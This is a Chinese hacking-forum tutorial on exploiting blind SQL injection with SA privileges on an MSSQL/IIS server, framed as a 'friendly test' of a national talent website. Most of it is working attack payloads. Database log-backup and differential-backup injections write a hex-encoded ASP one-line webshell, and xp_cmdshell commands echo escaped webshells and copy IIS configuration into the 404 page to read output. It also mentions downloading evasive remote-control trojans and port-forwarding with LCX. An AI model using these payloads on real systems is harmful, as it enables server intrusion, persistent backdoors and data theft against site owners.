sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————

2 D1 A& l! C5 F' f8 R" H6 z" B
                                                             欢迎高手访问指导，欢迎新手朋友交流学习。

                                                                 
+ w. u) N5 G7 L6 @                                                                 
                                                                  论坛： http://www.90team.net/

# O+ V- L4 O1 W- W
3 P! f  l2 p, o6 X4 w7 `. G( w
8 X, D: g- |) U: p* V$ T* N友情检测国家人才网
( U! M0 i' L9 ?, A& N( V2 y1 {

内容：MSSQL注入SA权限不显错模式下的入侵
5 }* v% ?# H& S9 h! P& E6 U  m
! h* u: q2 }0 d( P
一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。
: v3 w" F& T- Y. w
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。

2 ?4 [4 ^8 }! k5 c5 n4 R( B5 S
这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。

5 [2 N& B- ~# \! Z1 u/ L, j思路：
( D0 q& Q3 Z: r0 x
首先：

通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
4 G0 [$ Z& B( k
1.日志备份获得Webshell
" Z3 `: D  P. b2 m+ N" Q$ b
$ A0 v" V4 m) I& e/ h2.数据库差异备份获得Webshell

4.直接下载免杀远控木马。
9 S$ [6 m2 \" z' Y
: j  |) F- i! ?5.直接下载LCX将服务器端口转发出来

) ]8 p$ ]. @+ E& P  j6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
1 r& m$ d* p( S0 |. Z- y
& y) R( Z4 |% p8 {6 p; u
7 c/ O; W; m8 H9 b) J
在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
1 z( d+ |8 [1 f) ~/ j5 t2 R. M
我直接演示后面一个方法
! g) H4 @# U6 B; Q; @+ U

1 m8 t9 N9 r% @* ^分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
1 y! v& B7 k, B3 S$ E" }. Y6 q

0 h' w$ Z" R% V2 b5 |
( w1 g, m9 t9 \5 o1 u8 U% y9 D) l
◆日志备份：
1 I. s. y. ~" T1 ~$ P
$ {# k  j4 G: P6 j
7 c( L  M, }2 a$ l3 @% w" p1 f1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
6 M6 d& Q" x! `+ i
2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
; U3 t9 p9 j; B
+ G% m8 S8 P& _( }/ u" H& w" ~0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
' i. f2 P7 j+ C: R+ K4 X8 D3. 备份并获得文件，删除临时表
: A# \& O9 \7 d, r) G/ p;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--


8 r$ j% {* I1 d$ v! f
; n3 M2 {: G( T/ X' K◆数据库差异备份
$ j0 a! t& L! K4 u7 p; Q3 u) U
/ w1 A2 |5 m$ K( O（1. 进行差异备份准备工作

;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--

2 I& M  ~0 G5 s# i上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
' ^9 T! Y) G* [/ ?9 Q9 y4 ~
; G. |) S) H& D. ~6 W9 B4 {
8 h, m3 n/ o6 f1 k- h! u1 |（2. 将数据写入到数据库
+ V2 X( ]( b7 t  @+ o6 K;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
1 l7 h8 m& B  o. W8 l6 g) v
8 P: l+ ]& A  v4 i4 z0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
5 L0 r1 }1 v5 s  ?1 Y* f# \  _0 F, z
3 w% _1 d1 J* h; U+ p6 L3. 备份数据库并清理临时文件
+ z1 I% f& N6 A2 }% m: M+ w; n
" y( O8 M! ], f$ |;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
7 ?' I9 g  @, B' N
7 G  d# y9 R8 ~8 E/ Z
- @" f" `$ E$ X
用^转义字符来写ASP(一句话木马)文件的方法:   
8 z/ ?3 u! h# M3 _+ E* z' W, J: {8 [
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
9 s. @7 s& o6 d
* x. w9 F7 W9 A0 F( ?- y/ t6 Z- @2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

8 V9 |+ l: E! J读取IIS配置信息获取web路径

     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
* C  t& Y* {/ N6 x" V+ S7 S& v# R
执行命令
     
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--

$ u) F0 i6 R* V& W

( W3 r8 Z$ k2 H5 Z( R" t

- v* x9 D$ R: o



8 [+ [7 p* [' [. v
  g; c$ ^. h3 b

' z( O7 s! B  P6 A, H4 @/ C4 n  ^
* p/ V4 K/ P& d( ]1 b% o7 F
! |1 F3 i; k1 M  W8 i7 ?- N
% S& c) K2 X# L( x& Q; H/ l$ w

* T) F% Z2 V* ?' W* x



. |" \7 J& M- m1 [& {8 u

1 m8 ^* S3 g' a0 s% o9 f/ C; S0 O
! g' }; I7 ?! m



2 @8 B. B4 ?$ ^5 ~, ?9 }2 }4 K

  e5 ?$ d/ {9 ]+ a' l2 Q
. p& z0 {$ h  n
- \$ K$ b3 ~& b- i% N; o* r
: @7 H. ]9 [) n7 G% {
" `1 [: g$ f, L
3 i1 {& S% {* T" u' b( y
+ K; T; \. K- S# u2 I7 ?* H. Z4 t4 G

" c! N& U( R% e# \4 H! X



2 t! i0 j4 I: H- y; t: L
9 o" x: ]  z6 l) d
, w* B. Z9 W1 E( {( g% q  C: M

% ~& b6 U" w8 f# v+ W$ H7 T1 E
1 V; s4 g7 ~% B7 B9 R: F
6 Z! r3 M  }* v0 S